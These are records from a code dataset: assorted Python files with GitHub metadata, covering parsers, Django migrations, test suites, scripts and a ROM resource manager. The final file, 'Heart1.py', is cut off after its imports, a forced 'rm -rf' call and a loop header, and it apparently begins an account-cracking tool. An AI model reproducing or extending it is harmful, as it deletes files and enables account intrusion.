"jinxufang@tencent.com"
] | jinxufang@tencent.com |
096d626ce7a7af283743aee8c2538a17819466d5 | d9b05ce6e7de369905767cd20f52d7549b5f96d0 | /interpreter/dragon_book/ex_2_4_2.py | 65598f2afd9c23be3d5c84a9e9d782e6b95de5c2 | [] | no_license | constant-mihai/learnpython | 6847d08017ed963045f9bb5378e1c0890b8c66ff | 6e854ff96bba7979ba98ab631bd3267af5b9603d | refs/heads/master | 2020-03-23T00:14:21.700989 | 2018-08-05T09:59:45 | 2018-08-05T09:59:45 | 140,852,095 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,376 | py | #!/usr/bin/python3
lookahead = 0
#
# Match
#
def match(expression, char):
global lookahead
if expression[lookahead] == char:
lookahead+=1
else:
raise Exception("Error matching: " + char)
#
# Parse expression
#
def parse_expression(expression):
parse_expression_R(expression)
#
# Parse expression
#
def parse_expression_R(expression):
"""
Dragon book excercise 2.4.1
Second expression: S -> S (S) S | @
The production is left recursive. Need to transform it to
right recursive":
A -> Aa | b
-----------
A -> bR
R -> aR | @
Derived into:
S -> @R
R -> (S) S R
"""
global lookahead
if len(expression) <= lookahead:
print("Parsed everything.")
return
print ("Lookahead = {}".format(lookahead))
if expression[lookahead] == "(":
match(expression, "(")
parse_expression_2(expression)
match(expression, ")")
parse_expression_2(expression)
parse_expression_R(expression)
else:
print("Char: " + expression[lookahead])
#
# Main
#
def main():
print("Introduce an expresion of the type: ")
print("S -> S (S) S | @ ")
print("No spaces.")
expression = input("Input:")
lookahead = 0
parse_expression_2(expression)
#
# Module check
#
if __name__ == "__main__":
main()
| [
"constant.mihai@googlemail.com"
] | constant.mihai@googlemail.com |
8bed097e367631c63f10afc542fc6ca29a80a6b9 | 07a3ec7bddb516d942ba38a370ba80ae0c047483 | /start_worker.py | 3018669ab5cebecd06d08a4ae9c4eaf26dc69741 | [] | no_license | JackNeus/bookish-waddle | 8facf0d7745ae789887afa15e3011e1b25f6feea | 979e3bfeeaf9bdd0b936236062437a83dc322596 | refs/heads/master | 2020-03-28T17:53:30.247490 | 2019-05-03T20:13:37 | 2019-05-03T20:13:37 | 148,832,659 | 0 | 1 | null | 2019-05-03T19:35:39 | 2018-09-14T19:23:41 | Python | UTF-8 | Python | false | false | 914 | py | import os
os.environ["in_bookish"] = "true"
# Custom RQ worker.
from config import DevConfig, ProdConfig
from tasks.util import init_db_connection, set_config
from mongoengine import register_connection
from rq import Connection, Worker
import sys
config_class = DevConfig
if len(sys.argv) > 1:
mode = sys.argv[1]
if mode == "prod":
print("Running in production mode.")
config_class = ProdConfig
elif mode == "dev":
print("Running in development mode.")
config_class = DevConfig
else:
exit("Invalid argument.")
else:
print("Running in development mode (default).")
config = vars(config_class)
set_config(config)
init_db_connection()
from tasks.worker import BookishWorker
# Provide queue names to listen to as arguments to this script,
# similar to rq worker
with Connection():
qs = [config['REDIS_QUEUE_NAME']]
print("Starting BookishWorker...")
w = BookishWorker(qs)
w.work()
| [
"jack.neus@gmail.com"
] | jack.neus@gmail.com |
1f6ecc9a87a9cf8415c9d78c3fb3778a97bf9c3f | 255e7b37e9ce28bbafba5a3bcb046de97589f21c | /leetcode_everyday/pastqing_491.py | d6d078bb2db9b5627bf0299def84a620217e9fd1 | [] | no_license | dog2humen/ForTheCoffee | 697d2dc8366921aa18da2fa3311390061bab4b6f | 2f940aa9dd6ce35588de18db08bf35a2d04a54f4 | refs/heads/master | 2023-04-15T09:53:54.711659 | 2021-04-28T13:49:13 | 2021-04-28T13:49:13 | 276,009,709 | 2 | 2 | null | 2020-07-01T08:29:33 | 2020-06-30T05:50:01 | Python | UTF-8 | Python | false | false | 849 | py | # coding:utf8
from typing import List
class Solution:
def findSubsequences(self, nums: List[int]) -> List[List[int]]:
return self.findSubsequences_v1(nums)
def findSubsequences_v1(self, nums: List[int]) -> List[List[int]]:
res = []
self.helper(nums, 0, [], res)
return res
def helper(self, nums, start, cur, res):
if len(cur) > 1:
res.append(cur[:])
memo = set()
for i in range(start, len(nums)):
if nums[i] in memo:
continue
if len(cur) == 0 or cur[-1] <= nums[i]:
memo.add(nums[i])
self.helper(nums, i + 1, cur + [nums[i]], res)
if __name__ == '__main__':
obj = Solution()
nums = [4, 6, 7, 7]
#nums = [4, 3, 2, 1]
res = obj.findSubsequences(nums)
print(res)
| [
"116676671@qq.com"
] | 116676671@qq.com |
746804f360f1e40da68b13d2e7cfee548afc7669 | 69c470b8adbbc846b10f43c97390a5fbc11ab5d1 | /test.py | 8faf8eb42fbdce6cef33ed30462b5fab2972e737 | [] | no_license | kadikraman/RobotsOnMars | 9461108c4ba67d729f577fa09ed61d79e69e2994 | 243ed3a2d76d09300fa299df627e0326d71e3db6 | refs/heads/master | 2021-01-19T19:39:45.353847 | 2015-06-10T19:49:39 | 2015-06-10T19:49:39 | 37,213,250 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,037 | py | import unittest
from game import Mars, Robot
class MarsTest(unittest.TestCase):
def test_constructor(self):
mars = Mars(3, 4)
self.assertEqual(mars.max_x, 3)
self.assertEqual(mars.max_y, 4)
self.assertEqual(mars.min_x, 0)
self.assertEqual(mars.min_y, 0)
self.assertEqual(mars.scented_tiles, [])
def test_is_location_on_map(self):
mars = Mars(1, 2)
self.assertTrue(mars.is_location_on_map(1, 2))
self.assertTrue(mars.is_location_on_map(0, 0))
self.assertFalse(mars.is_location_on_map(2, 2))
self.assertFalse(mars.is_location_on_map(-1, 2))
def test_add_scented_tile(self):
mars = Mars(2, 2)
mars.add_scented_tile(1, 2)
self.assertTrue([1, 2] in mars.scented_tiles)
def test_is_tile_scented(self):
mars = Mars(2, 3)
mars.add_scented_tile(1, 0)
self.assertTrue(mars.is_tile_scented(1, 0))
class RobotTest(unittest.TestCase):
def test_constructor(self):
robot = Robot(1, 2, 'W', 'FFFFL')
self.assertEqual(robot.current_x, 1)
self.assertEqual(robot.current_y, 2)
self.assertEqual(robot.current_direction, 'W')
self.assertEqual(robot.instructions, 'FFFFL')
self.assertFalse(robot.has_been_lost)
def test_move_forward(self):
robot = Robot(1, 2, 'N', 'FFF')
robot.move_forward()
self.assertEqual(robot.current_x, 1)
self.assertEqual(robot.current_y, 3)
robot = Robot(1, 2, 'S', 'FFF')
robot.move_forward()
self.assertEqual(robot.current_x, 1)
self.assertEqual(robot.current_y, 1)
robot = Robot(1, 2, 'E', 'FFF')
robot.move_forward()
self.assertEqual(robot.current_x, 2)
self.assertEqual(robot.current_y, 2)
robot = Robot(1, 2, 'W', 'FFF')
robot.move_forward()
self.assertEqual(robot.current_x, 0)
self.assertEqual(robot.current_y, 2)
def test_move_backward(self):
robot = Robot(1, 3, 'N', 'FFF')
robot.move_backward()
self.assertEqual(robot.current_x, 1)
self.assertEqual(robot.current_y, 2)
robot = Robot(1, 1, 'S', 'FFF')
robot.move_backward()
self.assertEqual(robot.current_x, 1)
self.assertEqual(robot.current_y, 2)
robot = Robot(2, 2, 'E', 'FFF')
robot.move_backward()
self.assertEqual(robot.current_x, 1)
self.assertEqual(robot.current_y, 2)
robot = Robot(0, 2, 'W', 'FFF')
robot.move_backward()
self.assertEqual(robot.current_x, 1)
self.assertEqual(robot.current_y, 2)
def test_turn_left(self):
robot = Robot(1, 2, 'N', 'EFFF')
self.assertEqual(robot.turn('L'), 'W')
robot = Robot(1, 2, 'S', 'EFFF')
self.assertEqual(robot.turn('L'), 'E')
robot = Robot(1, 2, 'E', 'EFFF')
self.assertEqual(robot.turn('L'), 'N')
robot = Robot(1, 2, 'W', 'EFFF')
self.assertEqual(robot.turn('L'), 'S')
| [
"hellokadi@gmail.com"
] | hellokadi@gmail.com |
02c76a2e79fb0f9363e861f6d4bd62d7980bfd78 | fa869e034021609dd04bda44b4118909efc53b82 | /app/YtManagerApp/migrations/0001_initial.py | c294b27924a459dd06023245a0132cb88b5ea180 | [
"MIT"
] | permissive | J-tt/ytsm | 14bbb8ea4f1e39c99f8d01966e709e0b6c6c169d | f4a4f52f6cde6e9e931e2515c040e612c58cb031 | refs/heads/master | 2020-04-03T14:21:43.717656 | 2018-11-02T03:35:55 | 2018-11-02T03:35:55 | 155,319,047 | 1 | 0 | MIT | 2018-11-02T03:35:56 | 2018-10-30T03:29:11 | HTML | UTF-8 | Python | false | false | 5,067 | py | # Generated by Django 2.1.2 on 2018-10-11 00:19
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Channel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('channel_id', models.TextField(unique=True)),
('username', models.TextField(null=True, unique=True)),
('custom_url', models.TextField(null=True, unique=True)),
('name', models.TextField()),
('description', models.TextField()),
('icon_default', models.TextField()),
('icon_best', models.TextField()),
('upload_playlist_id', models.TextField()),
],
),
migrations.CreateModel(
name='Subscription',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField()),
('playlist_id', models.TextField(unique=True)),
('description', models.TextField()),
('icon_default', models.TextField()),
('icon_best', models.TextField()),
('auto_download', models.BooleanField(null=True)),
('download_limit', models.IntegerField(null=True)),
('download_order', models.TextField(null=True)),
('manager_delete_after_watched', models.BooleanField(null=True)),
('channel', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='YtManagerApp.Channel')),
],
),
migrations.CreateModel(
name='SubscriptionFolder',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField()),
('parent', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='YtManagerApp.SubscriptionFolder')),
],
),
migrations.CreateModel(
name='UserSettings',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('mark_deleted_as_watched', models.BooleanField(null=True)),
('delete_watched', models.BooleanField(null=True)),
('auto_download', models.BooleanField(null=True)),
('download_global_limit', models.IntegerField(null=True)),
('download_subscription_limit', models.IntegerField(null=True)),
('download_order', models.TextField(null=True)),
('download_path', models.TextField(null=True)),
('download_file_pattern', models.TextField(null=True)),
('download_format', models.TextField(null=True)),
('download_subtitles', models.BooleanField(null=True)),
('download_autogenerated_subtitles', models.BooleanField(null=True)),
('download_subtitles_all', models.BooleanField(null=True)),
('download_subtitles_langs', models.TextField(null=True)),
('download_subtitles_format', models.TextField(null=True)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Video',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('video_id', models.TextField()),
('name', models.TextField()),
('description', models.TextField()),
('watched', models.BooleanField(default=False)),
('downloaded_path', models.TextField(blank=True, null=True)),
('playlist_index', models.IntegerField()),
('publish_date', models.DateTimeField()),
('icon_default', models.TextField()),
('icon_best', models.TextField()),
('subscription', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='YtManagerApp.Subscription')),
],
),
migrations.AddField(
model_name='subscription',
name='parent_folder',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='YtManagerApp.SubscriptionFolder'),
),
migrations.AddField(
model_name='subscription',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| [
"chibicitiberiu@gmail.com"
] | chibicitiberiu@gmail.com |
85c8a05dbc3ccd700e56696411f9f0987cab48a8 | 8e8ea9e41032398fa8b1c54d73475a54aa11d293 | /page/quarter/quarter_statistic/quarter_statistic.py | 3df8bda70c25e22d603ec3c1cedd4f084dcf02b2 | [] | no_license | xmaimiao/wmPC_quarter | 6b69812b42039101d89076923c329d8e5952308b | 255666ccb5d2cac38b6975c0ae1ab055caabe41f | refs/heads/master | 2023-03-28T02:41:21.347163 | 2021-03-29T07:12:44 | 2021-03-29T07:12:44 | 352,538,443 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,686 | py | from common.contants import quarter_statistic_dir
from page.base.basepage import BasePage
from page.quarter.quarter_statistic.quarter_statistic_detail import Quarter_Statistic_Detail
class Quarter_Statistic(BasePage):
def wait_sleep(self,sleeps):
self.sleep(sleeps)
return self
def simple_search(self,keys):
'''
簡易查詢,傳進來一個字典{quarter_type:"全部",keywords:xxxx}
'''
self._params["quarter_name"] = keys["quarter_name"]
self.step(quarter_statistic_dir,"search_input")
return self
def advanced_search(self,keys):
'''
高级查詢,傳進來一個字典
{startTime:{switch:False,value:2020/01/05},endStartTime:{switch:False,value:2020/01/05},
startPlanExpireTime:{switch:False,value:2020/01/05},endPlanExpireTime:{switch:False,value:2020/01/05},
startFinishedNumber:{switch:False,value:0},endFinishedNumber:{switch:False,value:0},
startPushNumber:{switch:False,value:0},endPushNumber:{switch:False,value:0},
frequency:{switch:False,value:每天},
peopleOriented:{switch:False,value:限定人群},
status:{switch:False,value:進行中},
'''
self.step(quarter_statistic_dir, "click_advanced_search")
# if keys["startTime"]["switch"] == True:
# self._params["startTime"] = keys["startTime"]["value"]
# self.step(quarter_statistic_dir,"startTime")
# if keys["endStartTime"]["switch"] == True:
# self._params["endStartTime"] = keys["endStartTime"]["value"]
# self.step(quarter_statistic_dir,"endStartTime")
# if keys["startPlanExpireTime"]["switch"] == True:
# self._params["startPlanExpireTime"] = keys["startPlanExpireTime"]["value"]
# self.step(quarter_statistic_dir,"startPlanExpireTime")
# if keys["endPlanExpireTime"]["switch"] == True:
# self._params["endPlanExpireTime"] = keys["endPlanExpireTime"]["value"]
# self.step(quarter_statistic_dir,"endPlanExpireTime")
# 回收數量-前置
if keys["startFinishedNumber"]["switch"] == True:
self._params["startFinishedNumber"] = keys["startFinishedNumber"]["value"]
self.step(quarter_statistic_dir,"startFinishedNumber")
# 回收數量-後置
if keys["endFinishedNumber"]["switch"] == True:
self._params["endFinishedNumber"] = keys["endFinishedNumber"]["value"]
self.step(quarter_statistic_dir,"endFinishedNumber")
# if keys["startPushNumber"]["switch"] == True:
# self._params["startPushNumber"] = keys["startPushNumber"]["value"]
# self.step(quarter_statistic_dir,"startPushNumber")
# if keys["endPushNumber"]["switch"] == True:
# self._params["endPushNumber"] = keys["endPushNumber"]["value"]
# self.step(quarter_statistic_dir,"endPushNumber")
# 查詢問卷名稱
if keys["title"]["switch"] == True:
self._params["title"] = keys["title"]["value"]
self.step(quarter_statistic_dir,"title")
# # 查詢推送週期
# if keys["frequency"]["switch"] == True:
# self._params["frequency"] = keys["frequency"]["value"]
# self.step(quarter_statistic_dir, "frequency")
# # 查詢問卷類型
# if keys["peopleOriented"]["switch"] == True:
# self._params["frequency"] = keys["peopleOriented"]["value"]
# self.step(quarter_statistic_dir, "peopleOriented")
# 查询問卷状态
if keys["status"]["switch"] == True:
self._params["status"] = keys["status"]["value"]
self.step(quarter_statistic_dir, "status")
self.step(quarter_statistic_dir,"click_search")
return self
def view_the_fir(self,quarter_name):
'''
點擊第一行數據“查看”按鈕
'''
self._params["quarter_name"] = quarter_name
self.step(quarter_statistic_dir,"view_the_fir")
return Quarter_Statistic_Detail(self._driver)
def get_quarter_name_the_fir(self):
'''
編輯第一行問卷的名稱
'''
try:
return self.step(quarter_statistic_dir,"get_quarter_name_the_fir")
except Exception as e:
print("暫無數據!")
raise e
def get_quarter_status_the_fir(self):
'''
編輯第一行問卷的狀態
'''
try:
return self.step(quarter_statistic_dir,"get_quarter_status_the_fir")
except Exception as e:
print("暫無數據!")
raise e | [
"765120214@qq.com"
] | 765120214@qq.com |
cdf4b52ed6332f8f54fd6b2ebceb4ed51ac48bed | 547c2560e1ed1e0f822f7d9566d4cc9b772ab121 | /analyzing/result_analizer.py | 829fa801adea88fae6eb5b89c4f04d4b1c5ec7b8 | [] | no_license | NullSeile/pipeleak-prediction | a2cf1e441988ff643c9e25afc64ae08cf20ff2a0 | a86f6df041fc0c0dce5ebce92d0bf83294c01cfd | refs/heads/master | 2022-12-03T20:42:00.649304 | 2020-08-19T10:57:50 | 2020-08-19T10:57:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 603 | py | import psycopg2
import matplotlib.pyplot as plt
import seaborn as sns
import json
# Connect to the database
conn = psycopg2.connect(database='giswater3', user='postgres', password='postgres', host='localhost')
cursor = conn.cursor()
cursor.execute(f"SELECT log_message FROM api_ws_sample.audit_log_data where fprocesscat_id=48")
data = cursor.fetchall()
data = [json.loads(d[0])['value'] for d in data]
plt.figure(figsize=(9, 5), dpi=100)
sns.distplot(data, kde=False)
plt.ylabel("nombre de canonades", size=15)
plt.xlabel("predicció de la xarxa neuronal", size=15)
plt.tight_layout()
plt.show() | [
"eliesbertran@gmail.com"
] | eliesbertran@gmail.com |
68178180130d101c355eadc65d3bf4a483057241 | 322ee109855ecc20d44f11c9ad86a148a6f759ff | /wc.py | bf2be9f3395ffce137d603bdf2a04f6cc429da0a | [] | no_license | rvenkates/HelloWorld | ce6fe0f4866a9144982622e71c45c031668873c2 | d392c1da0ffa1f7fd024a4b8ae523467084f2c56 | refs/heads/master | 2021-01-17T17:45:56.579453 | 2016-06-23T04:02:16 | 2016-06-23T04:02:16 | 61,771,288 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,107 | py | # wc.py
import sys
# wc -l <file...>
# number of lines in the file(s)
# wc -w <file...>
# number of words in the file(s)
# wc -b <file...>
# number of characters in the file(s)
# wc -nbl <files...>
# number of non-blank-lines in the file
def count_lines(text):
return len(text.splitlines())
def count_words(text):
return len(text.split())
def count_characters(text):
return len(text)
def count_non_blank_lines(text):
lines = text.splitlines()
non_blank_lines = [line for line in lines if line.strip()]
return len(non_blank_lines)
modes = {'-l': count_lines,
'-w': count_words,
'-b': count_characters,
'-nbl': count_non_blank_lines}
if __name__ == '__main__':
mode = sys.argv[1] if len(sys.argv) >= 3 else '-l'
filenames = sys.argv[2:] if len(sys.argv) >= 3 else [__file__]
func = modes[mode]
total = 0
for filename in filenames:
with open(filename) as f:
text = f.read()
count = func(text)
total += count
print filename, count
| [
"ravenkat@gmail.com"
] | ravenkat@gmail.com |
4d12edf6f5c312dcdaf63d96d3601f13f20c4e8e | 475cc5a390984d135e638f0743581892734f3ae9 | /criterio2.py | 1df9cb6e0e7a31141fb49088c293e560aeaa3666 | [] | no_license | nataly0914/Priorizacion_proyectos | bfd9d39aa78ee207aaa12d30fafbcdc1e2c90b5e | 881b7d30a5adabff35247d7d5266dfaff9a4ff18 | refs/heads/master | 2022-12-17T17:43:57.420441 | 2020-09-22T01:43:25 | 2020-09-22T01:43:25 | 297,502,926 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,013 | py | import numpy as np
import csv
import pandas as pd
m = pd.read_excel('ahp(criterio2).xlsx') #matriz de comparaciones
result1 = m**2
#print(result1)
result2 = result1.sum(1) #suma filas
#print(result2)
result3 = result2.sum(0) #suma columnas
#print(result3)
result4c = result2*(1/result3)
print(result4c)
V2 = np.matrix(result4c).reshape(20, 1)
print('Valores propios', V2) #valores propios V
#CÁLCULO CONSISTENCIA LÓGICA
matrixB = m.sum(0) #suma de cada columna
B = np.matrix(matrixB).reshape(1, 20)
print('matriz B', B) #MATRIZ B
n = np.shape(B)[1] #dimensión (n)
maxVP = B*V2 #valor propio máximo
print("El máximo valor propio es:", maxVP)
indexC = (maxVP - n) / (n-1)
print('CI es', indexC)
indexA = (1.98 * (n-2))/n
print('IA es', indexA)
relationC = indexC / indexA
print(relationC)
if relationC <0.1:
print("Relación de consistencia adecuada")
else:
print("Es necesario reevaluar los juicios. Se debe consultar nuevamente a los expertos")
| [
"noreply@github.com"
] | noreply@github.com |
046c6d40b95bd73eb9c4ce844bf9e4a88bb0a451 | a5873ffbf8507bc42837cbedcfde1ea5d25f455b | /palindrome/is.py | d6d546a77c55b49bd8d665999034ea66d568536d | [] | no_license | jhnlsn/algo | 4bc62d2a81b045aee307cb4924c1678ad8170203 | 6d3d89cc1c59749cb6b00602fd4f7c778ccd0d47 | refs/heads/master | 2021-01-20T22:47:28.196546 | 2018-09-17T22:14:58 | 2018-09-17T22:14:58 | 101,826,060 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | py | def isPalindrome(S):
length=len(S)
if length < 2:
return True
elif S[0] != S[-1]:
return False
else:
return isPalindrome(S[1:length - 1])
# Yes
print isPalindrome("abnnba")
# No
print isPalindrome("what") | [
"jnelson11@gmail.com"
] | jnelson11@gmail.com |
ccfb2dcfad65cf7dddb9647376539a3e4cdefae4 | 51c38290efbc4e0ec4cffde9307d0da861d6fb14 | /projects/get_bitcoin_paprika.py | 1331c2f7c9c99a8a8dad6c22a944963ca828ceba | [] | no_license | octopusengine/octopuslab | 485c9babd0a333bacd94e12be82b0febb00482ce | 6941424ade1e5c2563290fb32cf39034a55968f6 | refs/heads/master | 2023-08-03T20:58:31.744462 | 2023-07-15T13:33:37 | 2023-07-15T13:33:37 | 123,679,465 | 32 | 22 | null | 2022-11-03T10:17:11 | 2018-03-03T09:52:52 | JavaScript | UTF-8 | Python | false | false | 479 | py | # get bitcoin
from time import sleep
import urequests, json
from utils.octopus import w
from shell.terminal import printTitle
w()
def bitcoin_usd():
res = urequests.get("https://api.coinpaprika.com/v1/tickers/btc-bitcoin")
btcusd = res.json()['quotes']["USD"]["price"]
return float(btcusd)
printTitle("get_bitcoin.py")
print("this is simple Micropython example | ESP32 & octopusLAB")
print()
while True:
btc = bitcoin_usd()
print(btc)
sleep(10)
| [
"honza.copak@gmail.com"
] | honza.copak@gmail.com |
ee457f289841191e83c633c08fc0988a43b1383d | 1cd732ab0060a8872830e59bb6e4f7a85af100a1 | /gbahack/resource.py | b806d2b00df82e99021820d4f0a77f97085ddb3f | [] | no_license | trevor403/GBA-Pokemon-Hacking | cfdfd82824fed52730a8c62fd8c1b53eca121e53 | b0d339cbfa763b3e5f44b480c764c85be07a2c4d | refs/heads/master | 2020-05-29T11:54:59.590692 | 2014-02-18T12:00:44 | 2014-02-18T12:00:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,787 | py |
class PointerObserver():
'''
Interface for classes that want to observe pointer changes.
By calling register(), the object is registered for pointer changes updates,
after such a change, the pointerChanged callback is called.
'''
def register(self, rm):
'''
Registers itself to the resource manager that the class
want to get notifications of pointer changes.
'''
rm.register(self)
def pointerChanged(self, rm, oldpointer, newpointer):
'''Callback from resource manger rm: a pointer has changed.'''
raise NotImplementedError()
def pointerRemoved(self, rm, pointer):
'''A pointer was removed from the ROM, and becomes an invalid resource.'''
raise NotImplementedError()
class ResourceManager():
'''Manager of ROM resources.'''
def __init__(self, rom):
self.rom = rom
self.pointerwatchers = []
#Keep resources in a list of resources, and a list of pointers
self.resources = {} #key: resource, value: pointer (None=no pointer)
self.pointers = {} #key: pointer, value: resource (note: contians only ROM-stored resources)
def register(self, pointerobserver):
'''
Register an PointerObserver object for pointer change callbacks.
Registee should be of type PointerObserver.
'''
self.pointerwatchers.append(pointerobserver)
def get(self, resourceclass, pointer):
'''
Returns an initialized resource, read from the rom.
Resourceclass is the resource class that should be read.
Pointer is the location in the ROM where the pointer is stored.
'''
if not pointer in self.pointers:
r = resourceclass.read(self.rom, pointer)
self.pointers[pointer] = r
self.resources[r] = pointer
elif not isinstance(self.pointers[pointer], resourceclass):
raise Exception("Pointer already loaded, but of different resource type.")
return self.pointers[pointer]
def store(self, resource, allow_replacement=True):
'''
Stores a resource in the ROM.
If the resource was not already stored, the resource is written into a
new location in the ROM.
If the resource was already stored the resource will be updated.
If allow_replacement is False, the resource is *always* written at the
old pointer location, possibly overwriting other data.
If a pointer location changes, all pointerwachters are informed.
Returns the new pointer location.
'''
oldpointer = None
if resource not in self.resources:
newpointer = resource.write(self.rom, 0x08000000) #TODO: Hardcoded :(
else:
oldpointer = self.resources[resource]
newpointer = resource.update(self.rom, oldpointer, allow_replacement)
del self.pointers[oldpointer]
self.pointers[newpointer] = resource
self.resources[resource] = newpointer
#Inform others only after the resoure manager indices are up to date.
if oldpointer and oldpointer != newpointer:
print("! Pointer 0x%X has been changed 0x%X"%(oldpointer, newpointer))
for watcher in self.pointerwachters:
watcher.pointerChanged(self, oldpointer, newpointer)
return newpointer
def delete(self, resource):
'''Removes a resource from the ROM and informs pointerwachters.'''
if resource not in self.resources:
return
pointer = self.resources[resource]
del self.resources[resource]
del self.pointers[pointer]
resource.delete(self.rom, pointer)
print("! Pointer 0x%X is removed from the ROM."%pointer)
for watcher in self.pointerwatchers:
watcher.pointerRemoved(self, pointer)
class Resource():
'''
Abstract class that represents a resource in a given ROM.
By implementing the read, and bytestringmethods, the developper gets
write, update and delete method for free.
This class does not deal with resources that depend of other resources,
for that, these dependencies should be added to implementations of
subclasses.
'''
name = "resource"
@classmethod
def read(cls, rom, pointer):
'''
Loads the resource from a rom, starting at a given pointer.
Returns a new initialized Resource object.
'''
raise NotImplementedError()
def bytestring(self):
'''
Returns the bytestring representation of the resource.
This is how the resource should be written to the ROM (i.e. the compiled
resource object). Returns an array.array('B') object.
'''
raise NotImplementedError()
### End of unimplemented methods ##
@classmethod
def delete(self, rom, pointer):
'''
Removes a resource of the implemented resource type from the ROM,
frees the memory in the rom and returns the removed object.
'''
old = self.read(rom, pointer)
rom.trunc(pointer, old.blength())
return old
def blength(self):
'''
Returns the length of the resource in bytes.
'''
return len(self.bytestring())
def write(self, rom, pointer=None, force=False):
'''
Writes the given resource to the rom, at the given pointer.
If there is not enough free space left at the given pointer:
1) and force==False, then the object is written at some free space.
2) and force==True, the objects is written anyway, possibly
overwriting other excisting data. Pointer should contain a valid
value.
If a resource has to be overwritten, it should be removed first.
Returns the pointer the resource was written to.
Note that this pointer does not have to match the requested pointer.
'''
#Assertions checking first
if force == True and not pointer:
raise Exception("Write to ROM: force is true, but no pointer was given.")
writebytes = self.bytestring()
blength = len(writebytes)
#Determine where to write the data to
writepointer = pointer
if not force == True:
writepointer = rom.findSpace(pointer or 0, blength)
rom.writeArray(writepointer, writebytes)
return writepointer
def update(self, rom, offset, force=False, writeoffset=None):
'''
Updates the given resource in the rom. If the new resource is larger
than the old one, the old data is removed, and the object is written
at another location in the ROM. If the resource is smaller than the old
one, the unused bytes are freed.
The offset parameter should point to the start of the old offset.
The force parameter set to true ensures that the resource is written at the exact location, no matter what.
The writeoffset is an optional parameter, if the resource does not fit, a new location is looked up for after this offset.
'''
old = self.delete(rom, offset)
if rom.findSpace(offset, self.blength()) == offset or force:
return self.write(rom, offset, force)
else:
#Need to move the resource
return self.write(rom, writeoffset, force)
| [
"theunknowncylon@live.nl"
] | theunknowncylon@live.nl |
921f2814602574d17fbd234becf4865925f0b64f | 488e0934b8cd97e202ae05368c855a57b299bfd1 | /Django/advanced/test_Blog/test_bookblog/book_app/migrations/0004_auto_20190408_1955.py | b4880c98ea624c5db12cdd69a946c614d2cc847a | [] | no_license | didemertens/udemy_webdev | 4d96a5e7abeec1848ecedb97f0c440cd50eb27ac | 306215571be8e4dcb939e79b18ff6b302b75c952 | refs/heads/master | 2020-04-25T00:24:45.654136 | 2019-04-13T16:00:47 | 2019-04-13T16:00:47 | 172,377,429 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 363 | py | # Generated by Django 2.1.7 on 2019-04-08 19:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('book_app', '0003_blog_intro'),
]
operations = [
migrations.AlterField(
model_name='blog',
name='intro',
field=models.TextField(),
),
]
| [
"d.g.j.mertens@gmail.com"
] | d.g.j.mertens@gmail.com |
d8879d70d7907d646a13effb15a75c6c4795902f | 3d6f48ff3d50eded2f1492f13bd1495311910c47 | /quiz/urls.py | 11b4a2f648804ad3764d4dda50fd1544ddca3b52 | [] | no_license | deepak9039/DK180_the_Hater-S_SIH2020 | b47ec2bb68a98cb1169665b5effbc79e7a72762e | ff14cd446bd732ec0b1a1e4b5fd67b697d9f659a | refs/heads/master | 2023-08-18T23:59:51.617725 | 2021-01-13T05:04:37 | 2021-01-13T05:04:37 | 284,043,080 | 0 | 0 | null | 2021-09-22T19:31:59 | 2020-07-31T13:28:42 | HTML | UTF-8 | Python | false | false | 630 | py | from django.urls import path, re_path
# from views import MyQuizListAPI, QuizListAPI, QuizDetailAPI, SaveUsersAnswer, SubmitQuizAPI
from . import views
urlpatterns = [
path("", views.MyQuizList.as_view(),name="myQuizList"),
path("quize/<slug>/", views.QuizDetail.as_view(),name="quizDetail"),
path("save-answer/", views.saveUserAnswer,name= "saveUserAnswer"),
path("result/<slug>/", views.show_result,name="result"),
path("instruction/", views.instruction,name= "instruction"),
# re_path(r"quizzes/(?P<slug>[\w\-]+)/$", QuizDetailAPI.as_view()),
# re_path(r"quizzes/(?P<slug>[\w\-]+)/submit/$", SubmitQuizAPI.as_view()),
] | [
"61735881+deepak9039@users.noreply.github.com"
] | 61735881+deepak9039@users.noreply.github.com |
9acc09596a0d2f48d39eb393cb68b008d68b6ff7 | 852c3151239d45267a5961fc0a2e94fa34dd741a | /Heart1.py | bd5458a3133bbea3be47442bea8c4aec5c3d6170 | [] | no_license | NudePagla/Nudebaba | 23bd3d984a2c966f94339a1c6ddd08859f7c16fa | c44746c830bf678d2afe7912dffd0f2c74c931f8 | refs/heads/main | 2023-02-28T22:17:31.914097 | 2021-02-13T10:35:58 | 2021-02-13T10:35:58 | 338,548,738 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,587 | py | # Ustad# SIDRA5# Thuglife# Usman Star# Gamz#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(99999):
